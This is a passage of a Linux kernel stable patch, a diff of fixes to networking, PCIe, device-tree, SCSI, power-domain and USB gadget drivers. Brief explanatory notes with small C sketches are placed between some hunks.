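            if (ret)
                    return ret;

            *out = *spinand->scratchbuf; /* copy out of the DMA-safe buffer */
            return 0;
    }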
+diff --git a/drivers/net/ethernet/Kconfig b/drivers/net/ethernet/Kconfig
+index 1917da7841919..5a274b99f2992 100644
+--- a/drivers/net/ethernet/Kconfig
++++ b/drivers/net/ethernet/Kconfig
+@@ -84,7 +84,6 @@ source "drivers/net/ethernet/huawei/Kconfig"
+ source "drivers/net/ethernet/i825xx/Kconfig"
+ source "drivers/net/ethernet/ibm/Kconfig"
+ source "drivers/net/ethernet/intel/Kconfig"
+-source "drivers/net/ethernet/wangxun/Kconfig"
+ source "drivers/net/ethernet/xscale/Kconfig"
+ 
+ config JME
+@@ -189,6 +188,7 @@ source "drivers/net/ethernet/toshiba/Kconfig"
+ source "drivers/net/ethernet/tundra/Kconfig"
+ source "drivers/net/ethernet/vertexcom/Kconfig"
+ source "drivers/net/ethernet/via/Kconfig"
++source "drivers/net/ethernet/wangxun/Kconfig"
+ source "drivers/net/ethernet/wiznet/Kconfig"
+ source "drivers/net/ethernet/xilinx/Kconfig"
+ source "drivers/net/ethernet/xircom/Kconfig"
+diff --git a/drivers/net/ethernet/intel/igb/igb_ptp.c b/drivers/net/ethernet/intel/igb/igb_ptp.c
+index 07171e574e7d7..36e62197fba0b 100644
+--- a/drivers/net/ethernet/intel/igb/igb_ptp.c
++++ b/drivers/net/ethernet/intel/igb/igb_ptp.c
+@@ -976,7 +976,7 @@ static void igb_ptp_tx_hwtstamp(struct igb_adapter *adapter)
+ 
+ 	igb_ptp_systim_to_hwtstamp(adapter, &shhwtstamps, regval);
+ 	/* adjust timestamp for the TX latency based on link speed */
+-	if (adapter->hw.mac.type == e1000_i210) {
++	if (hw->mac.type == e1000_i210 || hw->mac.type == e1000_i211) {
+ 		switch (adapter->link_speed) {
+ 		case SPEED_10:
+ 			adjust = IGB_I210_TX_LATENCY_10;
+@@ -1022,6 +1022,7 @@ int igb_ptp_rx_pktstamp(struct igb_q_vector *q_vector, void *va,
+ 			ktime_t *timestamp)
+ {
+ 	struct igb_adapter *adapter = q_vector->adapter;
++	struct e1000_hw *hw = &adapter->hw;
+ 	struct skb_shared_hwtstamps ts;
+ 	__le64 *regval = (__le64 *)va;
+ 	int adjust = 0;
+@@ -1041,7 +1042,7 @@ int igb_ptp_rx_pktstamp(struct igb_q_vector *q_vector, void *va,
+ 	igb_ptp_systim_to_hwtstamp(adapter, &ts, le64_to_cpu(regval[1]));
+ 
+ 	/* adjust timestamp for the RX latency based on link speed */
+-	if (adapter->hw.mac.type == e1000_i210) {
++	if (hw->mac.type == e1000_i210 || hw->mac.type == e1000_i211) {
+ 		switch (adapter->link_speed) {
+ 		case SPEED_10:
+ 			adjust = IGB_I210_RX_LATENCY_10;
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
+index dc2e204bcd727..41eac7dfb67e7 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
+@@ -52,8 +52,10 @@ int mlxsw_sp_acl_tcam_init(struct mlxsw_sp *mlxsw_sp,
+ 		max_regions = max_tcam_regions;
+ 
+ 	tcam->used_regions = bitmap_zalloc(max_regions, GFP_KERNEL);
+-	if (!tcam->used_regions)
+-		return -ENOMEM;
++	if (!tcam->used_regions) {
++		err = -ENOMEM;
++		goto err_alloc_used_regions;
++	}
+ 	tcam->max_regions = max_regions;
+ 
+ 	max_groups = MLXSW_CORE_RES_GET(mlxsw_sp->core, ACL_MAX_GROUPS);
+@@ -78,6 +80,8 @@ int mlxsw_sp_acl_tcam_init(struct mlxsw_sp *mlxsw_sp,
+ 	bitmap_free(tcam->used_groups);
+ err_alloc_used_groups:
+ 	bitmap_free(tcam->used_regions);
++err_alloc_used_regions:
++	mutex_destroy(&tcam->lock);
+ 	return err;
+ }
+ 
+@@ -86,10 +90,10 @@ void mlxsw_sp_acl_tcam_fini(struct mlxsw_sp *mlxsw_sp,
+ {
+ 	const struct mlxsw_sp_acl_tcam_ops *ops = mlxsw_sp->acl_tcam_ops;
+ 
+-	mutex_destroy(&tcam->lock);
+ 	ops->fini(mlxsw_sp, tcam->priv);
+ 	bitmap_free(tcam->used_groups);
+ 	bitmap_free(tcam->used_regions);
++	mutex_destroy(&tcam->lock);
+ }
+ 
+ int mlxsw_sp_acl_tcam_priority_get(struct mlxsw_sp *mlxsw_sp,
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 91b2aa81914ba..e2d51014ab4bc 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -3900,8 +3900,10 @@ static void stmmac_fpe_stop_wq(struct stmmac_priv *priv)
+ {
+ 	set_bit(__FPE_REMOVING, &priv->fpe_task_state);
+ 
+-	if (priv->fpe_wq)
++	if (priv->fpe_wq) {
+ 		destroy_workqueue(priv->fpe_wq);
++		priv->fpe_wq = NULL;
++	}
+ 
+ 	netdev_info(priv->dev, "FPE workqueue stop");
+ }
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index 937dd9cf4fbaf..7086acfed5b90 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -1902,26 +1902,26 @@ static int __init gtp_init(void)
+ 
+ 	get_random_bytes(&gtp_h_initval, sizeof(gtp_h_initval));
+ 
+-	err = rtnl_link_register(&gtp_link_ops);
++	err = register_pernet_subsys(&gtp_net_ops);
+ 	if (err < 0)
+ 		goto error_out;
+ 
+-	err = register_pernet_subsys(&gtp_net_ops);
++	err = rtnl_link_register(&gtp_link_ops);
+ 	if (err < 0)
+-		goto unreg_rtnl_link;
++		goto unreg_pernet_subsys;
+ 
+ 	err = genl_register_family(&gtp_genl_family);
+ 	if (err < 0)
+-		goto unreg_pernet_subsys;
++		goto unreg_rtnl_link;
+ 
+ 	pr_info("GTP module loaded (pdp ctx size %zd bytes)\n",
+ 		sizeof(struct pdp_ctx));
+ 	return 0;
+ 
+-unreg_pernet_subsys:
+-	unregister_pernet_subsys(&gtp_net_ops);
+ unreg_rtnl_link:
+ 	rtnl_link_unregister(&gtp_link_ops);
++unreg_pernet_subsys:
++	unregister_pernet_subsys(&gtp_net_ops);
+ error_out:
+ 	pr_err("error loading GTP module loaded\n");
+ 	return err;
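The reorder above restores the usual module-init rule: register what others depend on first (per-netns state before the rtnl link ops that can trigger it), and unwind in exact reverse order on failure. Schematically, with hypothetical subsystem names:

    static int __init demo_init(void)
    {
            int err;

            err = register_pernet_state();      /* used by link callbacks */
            if (err)
                    return err;

            err = register_link_ops();
            if (err)
                    goto unreg_pernet;

            err = register_genl_family();
            if (err)
                    goto unreg_link;

            return 0;

    unreg_link:
            unregister_link_ops();
    unreg_pernet:
            unregister_pernet_state();
            return err;
    }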
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 367255bb44cdc..922d6f16d99d1 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -653,6 +653,7 @@ static void __tun_detach(struct tun_file *tfile, bool clean)
+ 				   tun->tfiles[tun->numqueues - 1]);
+ 		ntfile = rtnl_dereference(tun->tfiles[index]);
+ 		ntfile->queue_index = index;
++		ntfile->xdp_rxq.queue_index = index;
+ 		rcu_assign_pointer(tun->tfiles[tun->numqueues - 1],
+ 				   NULL);
+ 
+diff --git a/drivers/net/usb/dm9601.c b/drivers/net/usb/dm9601.c
+index 99ec1d4a972db..8b6d6a1b3c2ec 100644
+--- a/drivers/net/usb/dm9601.c
++++ b/drivers/net/usb/dm9601.c
+@@ -232,7 +232,7 @@ static int dm9601_mdio_read(struct net_device *netdev, int phy_id, int loc)
+ 	err = dm_read_shared_word(dev, 1, loc, &res);
+ 	if (err < 0) {
+ 		netdev_err(dev->net, "MDIO read error: %d\n", err);
+-		return err;
++		return 0;
+ 	}
+ 
+ 	netdev_dbg(dev->net,
+diff --git a/drivers/net/usb/lan78xx.c b/drivers/net/usb/lan78xx.c
+index c458c030fadf6..4fd4563811299 100644
+--- a/drivers/net/usb/lan78xx.c
++++ b/drivers/net/usb/lan78xx.c
+@@ -1501,7 +1501,9 @@ static int lan78xx_link_reset(struct lan78xx_net *dev)
+ 
+ 		lan78xx_rx_urb_submit_all(dev);
+ 
++		local_bh_disable();
+ 		napi_schedule(&dev->napi);
++		local_bh_enable();
+ 	}
+ 
+ 	return 0;
+@@ -3035,7 +3037,8 @@ static int lan78xx_reset(struct lan78xx_net *dev)
+ 	if (dev->chipid == ID_REV_CHIP_ID_7801_)
+ 		buf &= ~MAC_CR_GMII_EN_;
+ 
+-	if (dev->chipid == ID_REV_CHIP_ID_7800_) {
++	if (dev->chipid == ID_REV_CHIP_ID_7800_ ||
++	    dev->chipid == ID_REV_CHIP_ID_7850_) {
+ 		ret = lan78xx_read_raw_eeprom(dev, 0, 1, &sig);
+ 		if (!ret && sig != EEPROM_INDICATOR) {
+ 			/* Implies there is no external eeprom. Set mac speed */
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index 36c5a41f84e44..dd9f5f1461921 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -1135,14 +1135,6 @@ static int veth_enable_xdp(struct net_device *dev)
+ 				veth_disable_xdp_range(dev, 0, dev->real_num_rx_queues, true);
+ 				return err;
+ 			}
+-
+-			if (!veth_gro_requested(dev)) {
+-				/* user-space did not require GRO, but adding XDP
+-				 * is supposed to get GRO working
+-				 */
+-				dev->features |= NETIF_F_GRO;
+-				netdev_features_change(dev);
+-			}
+ 		}
+ 	}
+ 
+@@ -1162,18 +1154,9 @@ static void veth_disable_xdp(struct net_device *dev)
+ 	for (i = 0; i < dev->real_num_rx_queues; i++)
+ 		rcu_assign_pointer(priv->rq[i].xdp_prog, NULL);
+ 
+-	if (!netif_running(dev) || !veth_gro_requested(dev)) {
++	if (!netif_running(dev) || !veth_gro_requested(dev))
+ 		veth_napi_del(dev);
+ 
+-		/* if user-space did not require GRO, since adding XDP
+-		 * enabled it, clear it now
+-		 */
+-		if (!veth_gro_requested(dev) && netif_running(dev)) {
+-			dev->features &= ~NETIF_F_GRO;
+-			netdev_features_change(dev);
+-		}
+-	}
+-
+ 	veth_disable_xdp_range(dev, 0, dev->real_num_rx_queues, false);
+ }
+ 
+@@ -1376,7 +1359,8 @@ static int veth_alloc_queues(struct net_device *dev)
+ 	struct veth_priv *priv = netdev_priv(dev);
+ 	int i;
+ 
+-	priv->rq = kcalloc(dev->num_rx_queues, sizeof(*priv->rq), GFP_KERNEL_ACCOUNT);
++	priv->rq = kvcalloc(dev->num_rx_queues, sizeof(*priv->rq),
++			    GFP_KERNEL_ACCOUNT | __GFP_RETRY_MAYFAIL);
+ 	if (!priv->rq)
+ 		return -ENOMEM;
+ 
+@@ -1392,7 +1376,7 @@ static void veth_free_queues(struct net_device *dev)
+ {
+ 	struct veth_priv *priv = netdev_priv(dev);
+ 
+-	kfree(priv->rq);
++	kvfree(priv->rq);
+ }
+ 
+ static int veth_dev_init(struct net_device *dev)
+@@ -1558,6 +1542,14 @@ static int veth_xdp_set(struct net_device *dev, struct bpf_prog *prog,
+ 		}
+ 
+ 		if (!old_prog) {
++			if (!veth_gro_requested(dev)) {
++				/* user-space did not require GRO, but adding
++				 * XDP is supposed to get GRO working
++				 */
++				dev->features |= NETIF_F_GRO;
++				netdev_features_change(dev);
++			}
++
+ 			peer->hw_features &= ~NETIF_F_GSO_SOFTWARE;
+ 			peer->max_mtu = max_mtu;
+ 		}
+@@ -1568,6 +1560,14 @@ static int veth_xdp_set(struct net_device *dev, struct bpf_prog *prog,
+ 			if (dev->flags & IFF_UP)
+ 				veth_disable_xdp(dev);
+ 
++			/* if user-space did not require GRO, since adding XDP
++			 * enabled it, clear it now
++			 */
++			if (!veth_gro_requested(dev)) {
++				dev->features &= ~NETIF_F_GRO;
++				netdev_features_change(dev);
++			}
++
+ 			if (peer) {
+ 				peer->hw_features |= NETIF_F_GSO_SOFTWARE;
+ 				peer->max_mtu = ETH_MAX_MTU;
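The allocation change in this hunk is independent of the GRO rework: the per-queue array scales with num_rx_queues and may exceed what kmalloc() can supply contiguously, so kvcalloc() permits a vmalloc fallback, while __GFP_RETRY_MAYFAIL keeps the contiguous attempt from invoking the OOM killer. A sketch with an illustrative type:

    #include <linux/slab.h>
    #include <linux/types.h>

    struct demo_queue { u64 packets; /* ... per-queue state ... */ };

    static struct demo_queue *demo_alloc_queues(unsigned int n)
    {
            /* Physically contiguous if possible, vmalloc-backed if not. */
            return kvcalloc(n, sizeof(struct demo_queue),
                            GFP_KERNEL | __GFP_RETRY_MAYFAIL);
    }

    /* Pair with kvfree(), which handles either backing store. */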
+diff --git a/drivers/of/overlay.c b/drivers/of/overlay.c
+index 4402871b5c0c0..e663d5585a057 100644
+--- a/drivers/of/overlay.c
++++ b/drivers/of/overlay.c
+@@ -45,8 +45,8 @@ struct target {
+ 
+ /**
+  * struct fragment - info about fragment nodes in overlay expanded device tree
+- * @target:	target of the overlay operation
+  * @overlay:	pointer to the __overlay__ node
++ * @target:	target of the overlay operation
+  */
+ struct fragment {
+ 	struct device_node *overlay;
+diff --git a/drivers/of/property.c b/drivers/of/property.c
+index 33d5f16c81204..da5d712197704 100644
+--- a/drivers/of/property.c
++++ b/drivers/of/property.c
+@@ -1332,7 +1332,7 @@ static struct device_node *parse_remote_endpoint(struct device_node *np,
+ 						 int index)
+ {
+ 	/* Return NULL for index > 0 to signify end of remote-endpoints. */
+-	if (!index || strcmp(prop_name, "remote-endpoint"))
++	if (index > 0 || strcmp(prop_name, "remote-endpoint"))
+ 		return NULL;
+ 
+ 	return of_graph_get_remote_port_parent(np);
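The one-character fix matters because of how these parsers are driven: each parse_* callback is called with index 0, 1, 2, ... and the first NULL ends the walk. remote-endpoint holds a single phandle, so the comment's intent is index > 0 => NULL, whereas the old !index test returned NULL at index 0 and hid the dependency entirely. The convention, sketched for a hypothetical single-valued property:

    static struct device_node *parse_demo_supplier(struct device_node *np,
                                                   const char *prop_name,
                                                   int index)
    {
            /* Index 0 is the only valid entry; anything later ends it. */
            if (index > 0 || strcmp(prop_name, "demo-supplier"))
                    return NULL;

            return of_parse_phandle(np, prop_name, 0);
    }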
+diff --git a/drivers/pci/controller/dwc/pci-layerscape-ep.c b/drivers/pci/controller/dwc/pci-layerscape-ep.c
+index ad99707b3b994..dd7d74fecc48e 100644
+--- a/drivers/pci/controller/dwc/pci-layerscape-ep.c
++++ b/drivers/pci/controller/dwc/pci-layerscape-ep.c
+@@ -18,6 +18,20 @@
+ 
+ #include "pcie-designware.h"
+ 
++#define PEX_PF0_CONFIG			0xC0014
++#define PEX_PF0_CFG_READY		BIT(0)
++
++/* PEX PFa PCIE PME and message interrupt registers */
++#define PEX_PF0_PME_MES_DR		0xC0020
++#define PEX_PF0_PME_MES_DR_LUD		BIT(7)
++#define PEX_PF0_PME_MES_DR_LDD		BIT(9)
++#define PEX_PF0_PME_MES_DR_HRD		BIT(10)
++
++#define PEX_PF0_PME_MES_IER		0xC0028
++#define PEX_PF0_PME_MES_IER_LUDIE	BIT(7)
++#define PEX_PF0_PME_MES_IER_LDDIE	BIT(9)
++#define PEX_PF0_PME_MES_IER_HRDIE	BIT(10)
++
+ #define to_ls_pcie_ep(x)	dev_get_drvdata((x)->dev)
+ 
+ struct ls_pcie_ep_drvdata {
+@@ -30,8 +44,99 @@ struct ls_pcie_ep {
+ 	struct dw_pcie			*pci;
+ 	struct pci_epc_features		*ls_epc;
+ 	const struct ls_pcie_ep_drvdata *drvdata;
++	int				irq;
++	u32				lnkcap;
++	bool				big_endian;
+ };
+ 
++static u32 ls_lut_readl(struct ls_pcie_ep *pcie, u32 offset)
++{
++	struct dw_pcie *pci = pcie->pci;
++
++	if (pcie->big_endian)
++		return ioread32be(pci->dbi_base + offset);
++	else
++		return ioread32(pci->dbi_base + offset);
++}
++
++static void ls_lut_writel(struct ls_pcie_ep *pcie, u32 offset, u32 value)
++{
++	struct dw_pcie *pci = pcie->pci;
++
++	if (pcie->big_endian)
++		iowrite32be(value, pci->dbi_base + offset);
++	else
++		iowrite32(value, pci->dbi_base + offset);
++}
++
++static irqreturn_t ls_pcie_ep_event_handler(int irq, void *dev_id)
++{
++	struct ls_pcie_ep *pcie = dev_id;
++	struct dw_pcie *pci = pcie->pci;
++	u32 val, cfg;
++	u8 offset;
++
++	val = ls_lut_readl(pcie, PEX_PF0_PME_MES_DR);
++	ls_lut_writel(pcie, PEX_PF0_PME_MES_DR, val);
++
++	if (!val)
++		return IRQ_NONE;
++
++	if (val & PEX_PF0_PME_MES_DR_LUD) {
++
++		offset = dw_pcie_find_capability(pci, PCI_CAP_ID_EXP);
++
++		/*
++		 * The values of the Maximum Link Width and Supported Link
++		 * Speed from the Link Capabilities Register will be lost
++		 * during link down or hot reset. Restore initial value
++		 * that configured by the Reset Configuration Word (RCW).
++		 */
++		dw_pcie_dbi_ro_wr_en(pci);
++		dw_pcie_writel_dbi(pci, offset + PCI_EXP_LNKCAP, pcie->lnkcap);
++		dw_pcie_dbi_ro_wr_dis(pci);
++
++		cfg = ls_lut_readl(pcie, PEX_PF0_CONFIG);
++		cfg |= PEX_PF0_CFG_READY;
++		ls_lut_writel(pcie, PEX_PF0_CONFIG, cfg);
++		dw_pcie_ep_linkup(&pci->ep);
++
++		dev_dbg(pci->dev, "Link up\n");
++	} else if (val & PEX_PF0_PME_MES_DR_LDD) {
++		dev_dbg(pci->dev, "Link down\n");
++	} else if (val & PEX_PF0_PME_MES_DR_HRD) {
++		dev_dbg(pci->dev, "Hot reset\n");
++	}
++
++	return IRQ_HANDLED;
++}
++
++static int ls_pcie_ep_interrupt_init(struct ls_pcie_ep *pcie,
++				     struct platform_device *pdev)
++{
++	u32 val;
++	int ret;
++
++	pcie->irq = platform_get_irq_byname(pdev, "pme");
++	if (pcie->irq < 0)
++		return pcie->irq;
++
++	ret = devm_request_irq(&pdev->dev, pcie->irq, ls_pcie_ep_event_handler,
++			       IRQF_SHARED, pdev->name, pcie);
++	if (ret) {
++		dev_err(&pdev->dev, "Can't register PCIe IRQ\n");
++		return ret;
++	}
++
++	/* Enable interrupts */
++	val = ls_lut_readl(pcie, PEX_PF0_PME_MES_IER);
++	val |=  PEX_PF0_PME_MES_IER_LDDIE | PEX_PF0_PME_MES_IER_HRDIE |
++		PEX_PF0_PME_MES_IER_LUDIE;
++	ls_lut_writel(pcie, PEX_PF0_PME_MES_IER, val);
++
++	return 0;
++}
++
+ static const struct pci_epc_features*
+ ls_pcie_ep_get_features(struct dw_pcie_ep *ep)
+ {
+@@ -124,6 +229,8 @@ static int __init ls_pcie_ep_probe(struct platform_device *pdev)
+ 	struct ls_pcie_ep *pcie;
+ 	struct pci_epc_features *ls_epc;
+ 	struct resource *dbi_base;
++	u8 offset;
++	int ret;
+ 
+ 	pcie = devm_kzalloc(dev, sizeof(*pcie), GFP_KERNEL);
+ 	if (!pcie)
+@@ -143,6 +250,7 @@ static int __init ls_pcie_ep_probe(struct platform_device *pdev)
+ 	pci->ops = pcie->drvdata->dw_pcie_ops;
+ 
+ 	ls_epc->bar_fixed_64bit = (1 << BAR_2) | (1 << BAR_4);
++	ls_epc->linkup_notifier = true;
+ 
+ 	pcie->pci = pci;
+ 	pcie->ls_epc = ls_epc;
+@@ -154,9 +262,18 @@ static int __init ls_pcie_ep_probe(struct platform_device *pdev)
+ 
+ 	pci->ep.ops = &ls_pcie_ep_ops;
+ 
++	pcie->big_endian = of_property_read_bool(dev->of_node, "big-endian");
++
+ 	platform_set_drvdata(pdev, pcie);
+ 
+-	return dw_pcie_ep_init(&pci->ep);
++	offset = dw_pcie_find_capability(pci, PCI_CAP_ID_EXP);
++	pcie->lnkcap = dw_pcie_readl_dbi(pci, offset + PCI_EXP_LNKCAP);
++
++	ret = dw_pcie_ep_init(&pci->ep);
++	if (ret)
++		return ret;
++
++	return ls_pcie_ep_interrupt_init(pcie, pdev);
+ }
+ 
+ static struct platform_driver ls_pcie_ep_driver = {
+diff --git a/drivers/phy/freescale/phy-fsl-imx8-mipi-dphy.c b/drivers/phy/freescale/phy-fsl-imx8-mipi-dphy.c
+index e625b32889bfc..0928a526e2ab3 100644
+--- a/drivers/phy/freescale/phy-fsl-imx8-mipi-dphy.c
++++ b/drivers/phy/freescale/phy-fsl-imx8-mipi-dphy.c
+@@ -706,7 +706,7 @@ static int mixel_dphy_probe(struct platform_device *pdev)
+ 			return ret;
+ 		}
+ 
+-		priv->id = of_alias_get_id(np, "mipi_dphy");
++		priv->id = of_alias_get_id(np, "mipi-dphy");
+ 		if (priv->id < 0) {
+ 			dev_err(dev, "Failed to get phy node alias id: %d\n",
+ 				priv->id);
+diff --git a/drivers/power/supply/bq27xxx_battery_i2c.c b/drivers/power/supply/bq27xxx_battery_i2c.c
+index 0713a52a25107..17b37354e32c0 100644
+--- a/drivers/power/supply/bq27xxx_battery_i2c.c
++++ b/drivers/power/supply/bq27xxx_battery_i2c.c
+@@ -209,7 +209,9 @@ static void bq27xxx_battery_i2c_remove(struct i2c_client *client)
+ {
+ 	struct bq27xxx_device_info *di = i2c_get_clientdata(client);
+ 
+-	free_irq(client->irq, di);
++	if (client->irq)
++		free_irq(client->irq, di);
++
+ 	bq27xxx_battery_teardown(di);
+ 
+ 	mutex_lock(&battery_mutex);
+diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
+index 5c5954b78585e..edd296f950a33 100644
+--- a/drivers/scsi/scsi_lib.c
++++ b/drivers/scsi/scsi_lib.c
+@@ -185,39 +185,37 @@ void scsi_queue_insert(struct scsi_cmnd *cmd, int reason)
+ 	__scsi_queue_insert(cmd, reason, true);
+ }
+ 
+-
+ /**
+- * __scsi_execute - insert request and wait for the result
+- * @sdev:	scsi device
++ * scsi_execute_cmd - insert request and wait for the result
++ * @sdev:	scsi_device
+  * @cmd:	scsi command
+- * @data_direction: data direction
++ * @opf:	block layer request cmd_flags
+  * @buffer:	data buffer
+  * @bufflen:	len of buffer
+- * @sense:	optional sense buffer
+- * @sshdr:	optional decoded sense header
+  * @timeout:	request timeout in HZ
+  * @retries:	number of times to retry request
+- * @flags:	flags for ->cmd_flags
+- * @rq_flags:	flags for ->rq_flags
+- * @resid:	optional residual length
++ * @args:	Optional args. See struct definition for field descriptions
+  *
+  * Returns the scsi_cmnd result field if a command was executed, or a negative
+  * Linux error code if we didn't get that far.
+  */
+-int __scsi_execute(struct scsi_device *sdev, const unsigned char *cmd,
+-		 int data_direction, void *buffer, unsigned bufflen,
+-		 unsigned char *sense, struct scsi_sense_hdr *sshdr,
+-		 int timeout, int retries, blk_opf_t flags,
+-		 req_flags_t rq_flags, int *resid)
++int scsi_execute_cmd(struct scsi_device *sdev, const unsigned char *cmd,
++		     blk_opf_t opf, void *buffer, unsigned int bufflen,
++		     int timeout, int retries,
++		     const struct scsi_exec_args *args)
+ {
++	static const struct scsi_exec_args default_args;
+ 	struct request *req;
+ 	struct scsi_cmnd *scmd;
+ 	int ret;
+ 
+-	req = scsi_alloc_request(sdev->request_queue,
+-			data_direction == DMA_TO_DEVICE ?
+-			REQ_OP_DRV_OUT : REQ_OP_DRV_IN,
+-			rq_flags & RQF_PM ? BLK_MQ_REQ_PM : 0);
++	if (!args)
++		args = &default_args;
++	else if (WARN_ON_ONCE(args->sense &&
++			      args->sense_len != SCSI_SENSE_BUFFERSIZE))
++		return -EINVAL;
++
++	req = scsi_alloc_request(sdev->request_queue, opf, args->req_flags);
+ 	if (IS_ERR(req))
+ 		return PTR_ERR(req);
+ 
+@@ -232,8 +230,7 @@ int __scsi_execute(struct scsi_device *sdev, const unsigned char *cmd,
+ 	memcpy(scmd->cmnd, cmd, scmd->cmd_len);
+ 	scmd->allowed = retries;
+ 	req->timeout = timeout;
+-	req->cmd_flags |= flags;
+-	req->rq_flags |= rq_flags | RQF_QUIET;
++	req->rq_flags |= RQF_QUIET;
+ 
+ 	/*
+ 	 * head injection *required* here otherwise quiesce won't work
+@@ -249,20 +246,21 @@ int __scsi_execute(struct scsi_device *sdev, const unsigned char *cmd,
+ 	if (unlikely(scmd->resid_len > 0 && scmd->resid_len <= bufflen))
+ 		memset(buffer + bufflen - scmd->resid_len, 0, scmd->resid_len);
+ 
+-	if (resid)
+-		*resid = scmd->resid_len;
+-	if (sense && scmd->sense_len)
+-		memcpy(sense, scmd->sense_buffer, SCSI_SENSE_BUFFERSIZE);
+-	if (sshdr)
++	if (args->resid)
++		*args->resid = scmd->resid_len;
++	if (args->sense)
++		memcpy(args->sense, scmd->sense_buffer, SCSI_SENSE_BUFFERSIZE);
++	if (args->sshdr)
+ 		scsi_normalize_sense(scmd->sense_buffer, scmd->sense_len,
+-				     sshdr);
++				     args->sshdr);
++
+ 	ret = scmd->result;
+  out:
+ 	blk_mq_free_request(req);
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL(__scsi_execute);
++EXPORT_SYMBOL(scsi_execute_cmd);
+ 
+ /*
+  * Wake up the error handler if necessary. Avoid as follows that the error
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index 31b5273f43a71..4433b02c8935f 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -3284,6 +3284,24 @@ static bool sd_validate_opt_xfer_size(struct scsi_disk *sdkp,
+ 	return true;
+ }
+ 
++static void sd_read_block_zero(struct scsi_disk *sdkp)
++{
++	unsigned int buf_len = sdkp->device->sector_size;
++	char *buffer, cmd[10] = { };
++
++	buffer = kmalloc(buf_len, GFP_KERNEL);
++	if (!buffer)
++		return;
++
++	cmd[0] = READ_10;
++	put_unaligned_be32(0, &cmd[2]); /* Logical block address 0 */
++	put_unaligned_be16(1, &cmd[7]);	/* Transfer 1 logical block */
++
++	scsi_execute_cmd(sdkp->device, cmd, REQ_OP_DRV_IN, buffer, buf_len,
++			 SD_TIMEOUT, sdkp->max_retries, NULL);
++	kfree(buffer);
++}
++
+ /**
+  *	sd_revalidate_disk - called the first time a new disk is seen,
+  *	performs disk spin up, read_capacity, etc.
+@@ -3323,7 +3341,13 @@ static int sd_revalidate_disk(struct gendisk *disk)
+ 	 */
+ 	if (sdkp->media_present) {
+ 		sd_read_capacity(sdkp, buffer);
+-
++		/*
++		 * Some USB/UAS devices return generic values for mode pages
++		 * until the media has been accessed. Trigger a READ operation
++		 * to force the device to populate mode pages.
++		 */
++		if (sdp->read_before_ms)
++			sd_read_block_zero(sdkp);
+ 		/*
+ 		 * set the default to rotational.  All non-rotational devices
+ 		 * support the block characteristics VPD page, which will
+diff --git a/drivers/soc/qcom/rpmhpd.c b/drivers/soc/qcom/rpmhpd.c
+index 092f6ab09acf3..9a90f241bb97f 100644
+--- a/drivers/soc/qcom/rpmhpd.c
++++ b/drivers/soc/qcom/rpmhpd.c
+@@ -492,12 +492,15 @@ static int rpmhpd_aggregate_corner(struct rpmhpd *pd, unsigned int corner)
+ 	unsigned int active_corner, sleep_corner;
+ 	unsigned int this_active_corner = 0, this_sleep_corner = 0;
+ 	unsigned int peer_active_corner = 0, peer_sleep_corner = 0;
++	unsigned int peer_enabled_corner;
+ 
+ 	to_active_sleep(pd, corner, &this_active_corner, &this_sleep_corner);
+ 
+-	if (peer && peer->enabled)
+-		to_active_sleep(peer, peer->corner, &peer_active_corner,
++	if (peer && peer->enabled) {
++		peer_enabled_corner = max(peer->corner, peer->enable_corner);
++		to_active_sleep(peer, peer_enabled_corner, &peer_active_corner,
+ 				&peer_sleep_corner);
++	}
+ 
+ 	active_corner = max(this_active_corner, peer_active_corner);
+ 
+diff --git a/drivers/usb/gadget/composite.c b/drivers/usb/gadget/composite.c
+index cb0a4e2cdbb73..247cca46cdfae 100644
+--- a/drivers/usb/gadget/composite.c
++++ b/drivers/usb/gadget/composite.c
+@@ -511,6 +511,19 @@ static u8 encode_bMaxPower(enum usb_device_speed speed,
+ 		return min(val, 900U) / 8;
+ }
+ 
++void check_remote_wakeup_config(struct usb_gadget *g,
++				struct usb_configuration *c)
++{
++	if (USB_CONFIG_ATT_WAKEUP & c->bmAttributes) {
++		/* Reset the rw bit if gadget is not capable of it */
++		if (!g->wakeup_capable && g->ops->set_remote_wakeup) {
++			WARN(c->cdev, "Clearing wakeup bit for config c.%d\n",
++			     c->bConfigurationValue);
++			c->bmAttributes &= ~USB_CONFIG_ATT_WAKEUP;
++		}
++	}
++}
++
+ static int config_buf(struct usb_configuration *config,
+ 		enum usb_device_speed speed, void *buf, u8 type)
+ {
+@@ -959,6 +972,11 @@ static int set_config(struct usb_composite_dev *cdev,
+ 		power = min(power, 500U);
+ 	else
+ 		power = min(power, 900U);
++
++	if (USB_CONFIG_ATT_WAKEUP & c->bmAttributes)
++		usb_gadget_set_remote_wakeup(gadget, 1);
++	else
++		usb_gadget_set_remote_wakeup(gadget, 0);
+ done:
+ 	if (power <= USB_SELF_POWER_VBUS_MAX_DRAW)
+ 		usb_gadget_set_selfpowered(gadget);
+diff --git a/drivers/usb/gadget/configfs.c b/drivers/usb/gadget/configfs.c
+index 4dcf29577f8f1..b94aec6227c51 100644
+--- a/drivers/usb/gadget/configfs.c
++++ b/drivers/usb/gadget/configfs.c
+@@ -1376,6 +1376,9 @@ static int configfs_composite_bind(struct usb_gadget *gadget,
+ 		if (gadget_is_otg(gadget))
+ 			c->descriptors = otg_desc;
+ 
++		/* Properly configure the bmAttributes wakeup bit */
++		check_remote_wakeup_config(gadget, c);
++
+ 		cfg = container_of(c, struct config_usb_cfg, c);
